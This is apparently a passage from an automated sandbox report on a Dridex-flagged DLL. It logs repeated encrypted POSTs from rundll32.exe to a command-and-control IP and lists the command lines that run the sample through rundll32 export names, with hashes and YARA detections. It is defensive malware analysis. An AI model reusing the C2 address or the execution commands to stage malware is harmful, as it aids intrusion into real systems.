                        |                    |           | Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:54 UTC | 438                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 03:00:54 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
88         | 192.168.2.6 | 50182       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:00:56 UTC | 439                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4850
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 03:00:56 UTC | 439                | OUT       | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:57 UTC | 443                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 03:00:57 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
89         | 192.168.2.6 | 50186       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:00:57 UTC | 444                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4862
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 03:00:57 UTC | 444                | OUT       | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:58 UTC | 448                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 03:00:58 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
9          | 192.168.2.6 | 49791       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:58:18 UTC | 44                 | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4850
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:58:18 UTC | 45                 | OUT       | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:19 UTC | 49                 | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:58:19 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
90         | 192.168.2.6 | 50190       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 03:01:00 UTC | 449                | OUT       | POST / HTTP/1.1
                                                           Host: 192.46.210.220
                                                           Content-Length: 4850
                                                           Connection: Close
                                                           Cache-Control: no-cache
2021-10-28 03:01:00 UTC | 449                | OUT       | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                           Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:01:00 UTC | 453                | IN        | HTTP/1.1 403 Forbidden
                                                           Server: nginx/1.15.12
                                                           Date: Thu, 28 Oct 2021 03:01:00 GMT
                                                           Content-Type: text/plain; charset=utf-8
                                                           Connection: close


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 04:56:54
Start date: 28/10/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll'
Imagebase: 0xaa0000
File size: 893440 bytes
MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.888568308.000000006EFE1000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.478698643.0000000001270000.00000040.00000001.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 04:56:55
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 04:56:55
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing
Imagebase: 0x1340000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000003.433688939.0000000004C00000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 04:56:55
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
Imagebase: 0x1340000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.898148863.000000006EFE1000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.435699567.0000000000610000.00000040.00000010.sdmp, Author: Joe Security
Reputation: high

General

Start time: 04:56:59
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth
Imagebase: 0x1340000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.467247040.0000000004B00000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 04:57:06
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust
Imagebase: 0x1340000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.475590656.0000000000DE0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

Disassembly

Code Analysis
